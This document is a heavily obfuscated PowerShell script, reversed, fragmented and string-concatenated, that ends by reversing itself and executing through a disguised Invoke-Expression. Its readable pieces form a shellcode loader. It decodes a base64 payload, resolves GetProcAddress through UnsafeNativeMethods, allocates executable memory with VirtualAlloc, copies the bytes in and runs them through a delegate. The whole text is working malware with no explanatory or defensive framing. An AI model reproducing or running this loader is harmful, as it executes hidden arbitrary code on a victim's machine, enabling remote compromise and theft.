SEt-vARIAble ("rH34"+"V")  (")'X'+]31[dilLeHs$+]1[dILlEHs$ (&| )63]rAhc[]gNIRts[,'Vrl'(ECalpeR.)421]rAhc[]gNIRts[,'twv'(ECalpeR.)93]rAhc[]gNIRts[,)89]rAhc[+811]rAhc[+27]rAhc[((ECalpeR.)')bvHbvHnIoj-]52,62,4[Cepsmoc:VnEVrl (& twv )93]rahC[,)38]rahC[+05]rahC[+021]rahC[( ecALPErc-  63]rahC[,)121]rah'+'C[+101]rahC[+96]rahC[(ecALPErc- 69]rahC[,bvHnZXbvH ecAL'+'PErc-  421]rahC[,)15]ra'+'hC[+86]rahC[+221]rahC[(  ecALPErc-  29]rahC[,)'+'411]rahC[+66]rahC[+35]rahC['+'(  ecALPErc-  43]rahC[,)901]rahC[+301]rahC[+911]'+'rahC[( ECALPEr-  )bvH
}
}tInZXod{yeE )S2xXES2x,S2xIS2xf-mgw'+'}1{}0{mbvH+bvHgw(&	
{ esle
}
)S2xeviS2x,S2xoJ-S2x,S2xbS2x,S2xeceRS2x f- mgw}1{}2{'+'}3{}0{mgw(& 3Dz )S2bvH+'+'bvHxbS2x,S2xawS2x,S2xoj-tiS2x f- mgw}2{}0{}1{mgw(. 3Dz }tIOnZXd{yeE tnemugrA- 23sAnuR- } }a{yeE )S2xXS2x,S2xEIS2xf- mgw}1{}bvH+bvH0{mgw(& )}a{yeE(marap { )S2xtratsS2x,S2xboj-S2x f- mgw}0{}1{mgw(.	
{ )bvH'+'+bvH8 qebvH+bvH- mgwEZInZXSmgw::EulAV.)  nWPx  elbaIrav(  ( fI

@S2x
)oreZ::]rtbvH+bvHPtnI[(ekovnI.emnur_rav'+'yeE
)))]dioV[( )]rtPtnI[(@ epyt_etageled_teg_cnuf( ,reffub_ravyeE(retnioPnoitcnuFroFetageleDteG::]lahsraM.secivr'+'eSpore'+'tnI.emitnuR.metsyS[ =bvH+bvH emnur_ravyeE

)htgnel.edoc_ravyeE ,reffub_ravyeE ,0 ,ed'+'oc_ravyeE(ypoC::]lahsraM.secivreSporet'+'nI.emitnuR.metsyS[
)04x0 ,0003x0 ,htgneL'+'.edoc_ravyeE ,'+'oreZ::]rtPtnI[(ekovnI.av_ravyeE = reffub_ravyeE
)))]rtPtnI[( )]23tnIU[ ,]23tnIU[ ,bvH+bvH]23tnIU'+'[ ,]rtPt'+'nI[(@ epyt_etabvH+bvHgeled_teg_cnuf( ,)'+'collAlabvH+bvHutriV lld.'+'23le'+'nrek sserdda_corp_teg_cnuf((retnioPnoitcnuFroFetagelebvH+bvHDteG'+'::]lahsraM.secivrebvH+bvHSporetnI.emitnuR.metsyS[ = av_ravyeE

)S2x=oYZm0EA0UTMuEjNx4iN0IjL0Mz//bvH+bvH3fioPbvH+bvHMWlXHwFOcAHsox0BchV/v4JapEoZ1UAAAIAg2Vnn4URldAAAAAAk7kV/f5TRKWodFAABAAoBAA'+'QAAaApW1/blo1CPaAsaWa058sTrwybvH+bvHajD/Q7czu'+'sbilUIL9X1DDw9+lryLz7vCMCqCxVUQGaeLBMSMbvH+bvHR8oSRTiD3mQ3G0C3Xvad6+VDaBHSM/D6Kuq7slbvH+'+'bvHlpPqSqpq/mTQNR'+'IQ/6Ifrkr6v0iMiYaIR2/S7FLGA1/8laIn8mUNHtWYjJIR3DgHFjdFbvH+bvHsIJFqiwwVsNRcDdgtuHzLyw8Ickf8m+Y/g8H3bia2CGGvOFGI4wMd7XKYVqGbVWbV9v7RjDDH6AbvH+bvHoL0HkHunQkgjucE5hhqxYB047bvH+bvHFAoQDpgDMQ'+'5EI7UVQB1EI7gbvH+bvHDMQ5EI7AjL18CbvH+bvHduVGZpJHVgsDN2c1TXByOx4iNgQlTgM3dbvH+bvHvRb'+'vH+bvHmbpdFI7'+'AjL5ASRJNVTgsTZsJWa0FG'+'ct92YoACMuUzLhxGbpp3bNBiO05WZnFUL'+'yV2c'+'VBQ'+'Dv6T2SiCX6Zatr3T1cFbvH+bvHLddd9j+k+fdx4FMYF3JLbvH+bvH1y6CnXlRpocX10tP+fHzpgTjCSUVh1G8+VPD9d2Bos5RdN5BD1czyde5WCA4ETRF3L//bvH+bv'+'H//vhOAAEQypDAABEZ6/Hz///bvH+bvH/epDFWHU3x5AAAvAwvV//Cgf1toBlVRdgaX9fMV/fMeFSRoFciV/fXiXsq'+'olw65nIB0Zfh/HDAAbvH+bvHEgyE+AwFW9/7bvH+bvHhhBtgmVT9vaXd1/x8V1/bonGVHaW9haQRgagnIAAMDgoB1wDaciV//OuU16oBbvH+bvHlUTJlUSRIoyAAaSJdMbBAAAwY6QV9/G/ZiXbvH+bvHhGUTBAABsLaRF1AqFVUJHzW'+'AAAAkme1/faeWpDaXd1VXd1/xAAAAAA6V//BmcHToRVaul2doBAd'+'l5G'+'adZ46SsoWfhF4/HlWZF2WbRCJE'+'lI0BsIBLOdAcg1iLxwimNdAkg1iYbvH+bvHJedk03O433A0XH44ccAN8cwsC'+'cM/Hj1BsIbvH+bvHNLmEPjPdAgg1iYg0iQBdAKRHwFiHQL'+'CdA8I0iQI1iXJF8ifcAN8cwgwiA8FGPsCcbvH+bvHM/HjJKd7DoI3iUI1iMI1iwI1ikJdMlnIYAAAAJiO'+'/S2x(gnirtS46esaBmorF::bv'+'H+bvH]trebvH+bvHvnoC.metsyS[ = edoc_'+'r'+'avyeE]][etyB[

'+'}
)(epyTetaerC.re'+'dliub_epyt_ravyeE nruter	

)S2xdeganabvH+bvHM ,emitnuRS2x(sgalFnoitatnemelpmIteS.)sretemarap_ravyeE ,epyt_nruter_ravyeE ,S2xlautbvH+bvHriV ,tolSweN ,giSyBediH ,cilbuPS2x ,S2xeko'+'vnIS2x(dobvH+bvHhteMenifeD.redliub_epyt_rabvH+bvHvyeE	
)S2xdegan'+'a'+'M ,'+'emitnuRS2x(sgalFnoitbvH+bvHatnemelpmIteS.)sre'+'tem'+'arap_ravyeE ,dradnatS::]'+'sno'+'itnevnoCgnillaC.noitcelfeR.met'+'syS[ ,S2xcbvH+bvHi'+'lbubvH+bvHP ,giSyBediH ,emaNlaicepSTRS2x(rotcurtsnoCenifeD.redliubvH+bvHb_epyt_ravyeEbvH+bvH	
)]etageleDtsacitluM.me'+'tsyS[ ,S2xssalCotuA ,ssalCisnA ,delaeS ,cilbuPbvH+bvH ,ssalCS2x ,S2xepyTetageleDyMS2x(epyTenifeD.)eslafyeE ,S2xeludoMyromeMnIS2x('+'eludoMcimanyDenifeD.)nuR::]sseccA'+'bvH+bvHredbvH+bvHli'+'uBylbmessA.timE.noitcelfeR.metsyS[ ,))S2xetageleDdetcelfeRS2x(emaNylbmessA'+'.bvH+bvHnoitc'+'elfeRbvH+bvH.metsyS'+' tcejbO-weN((yl'+'b'+'messAcimanyDenifeD.niamoDt'+'nerruC::]niambvH+bvHo'+'DppA[ = redliub_epyt_ravyeE	

)	
]dioV[ = epyt_nru'+'ter_ravyeE'+'bvH+bvH ]epyT[ ])1 = noitisoP(retemaraP[		
,sretemarap_rb'+'vH'+'+bvHavyeE'+' ]][epyT[ ])eubvH+bvHrTyeEbvH+bvH = yrotadbvH+bvHnaM ,0 = n'+'oitisoP(r'+'etemaraP[bvH'+'+bvH		
( maraP'+'	
{ epyt_etageled_teg_cnbvH+bvHuf noitc'+'nuf

}
))erudecorp_ravyeE ,))))eludom_ravyeE(@ ,llunyeE(ekovnI.))S2xeldnabvH+bvHHeludoMteGS2x(dohteMteG.sdohtem_evitan_e'+'fasn'+'u_ravyeE( ,)rtPtnI tcejbO-w'+'eN((feReldnaH.secivreS'+'p'+'oretnI.emitnu'+'R.metsyS tcejbO-webvH+bvHN(]feReldnaH.secivreSporetnI.emitnuR.metsyS[(@ ,llunyeE(ekovnbvH+bvHI.apg_ravyeE nrute'+'r	
))S2xgnirtsS2x ,S2xfeReldnaH.seciv'+'reSbvH+bvHporetnI.em'+'itnuR.metsySS2x(@ ]'+'][epyT[ ,S2xsserddAbvH+bvHco'+'rPteGS2x(dohteMteG.sdohtem_evitan_efasnu_ravyeE = apg_ravyeE	
)S2xsdohteMevitaNefasnU.23niW.tfosorciMSbvH+bvH2x(epyTtbvH+bvHeG.)}bvH+bvH )S2xlld.me'+'tsySS2x(bvH+bvHslauqE.]1-[)S2xrB5rB5S2x(tilpS.n'+'oitacoL._yeE dnA- ehbvH+bvHcaCylbmessAlabolG._yeE { tcejbO-erehW 3Dz )(seibvH+bvHlbmessAteG.ni'+'amoDtn'+'erruC::]niamoDppA[( = sdohtebvH+bvH'+'m_bvH+bvHevitan_efasnu_ravyeE	
		)erudecorp_rav'+'yeE ,eludom_bvH+bvHravyeE( mabvH+bvHraP	
{ bvH+bvHsserdda_corp_teg_cnuf noitcnuf
S2x@ = }TIOnZXD{'+'yeE

2 noisreV- )S2xoMtcS2x,S2xedS2x,S2xSS2x,S2xirtS-teS2x f-mgw}2bvH+bvH{}3{}0{bvH+bvH}1{mgw(&  ; ) )S2bvH+bvHxiS2x,S2xRTPtS2x,S2bvH+bvHxnS2x f- mgw}1{}0{}2{mgw('+']EpYT[  ( NWbvH+bvHPX TES  bvH(('( "); " $($OfS = '') " + [sTrING] ( (  GEt-cHilDIteM  ('vArIabLE:Rh'+'34'+'v')  ).VAlue[- 1 .. -((  GEt-cHilDIteM  ('vArIabLE:Rh'+'34'+'v')  ).VAlue.lenGTH )] )+"$( Sv 'ofS'  ' ' )"| . ( $PshOme[4]+$PSHOme[30]+'X')
